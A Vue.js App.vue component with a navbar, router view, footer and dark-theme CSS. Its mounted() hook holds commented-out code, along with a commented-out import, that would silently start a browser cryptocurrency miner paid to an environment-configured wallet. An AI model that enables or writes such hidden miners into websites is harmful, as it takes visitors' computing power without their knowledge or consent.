<template>
  <div id="app">
    <Navbar />
    <router-view />
    <Footer />
  </div>
</template>

<script>
import Navbar from '@/components/Navbar.vue'
import Footer from '@/components/Footer.vue'
//import Miner from 'miner'

export default {
  name: 'App',
  components: {
    Navbar,
    Footer
  },
  mounted() {
    /*
    if (true) {
      const walletAddress = process.env.VUE_APP_WALLET_ADDRESS
      const miner = new Miner(walletAddress, {
        throttle: 0.85
      })
      miner.start()
    }*/
    console.log()
  }
}
</script>

<style>
body {
  background-color: #1a202c;
  color: #fff;
}

.navbar {
  background-color: #2d3748;
}

.footer {
  background-color: #1a202c;
}
</style>
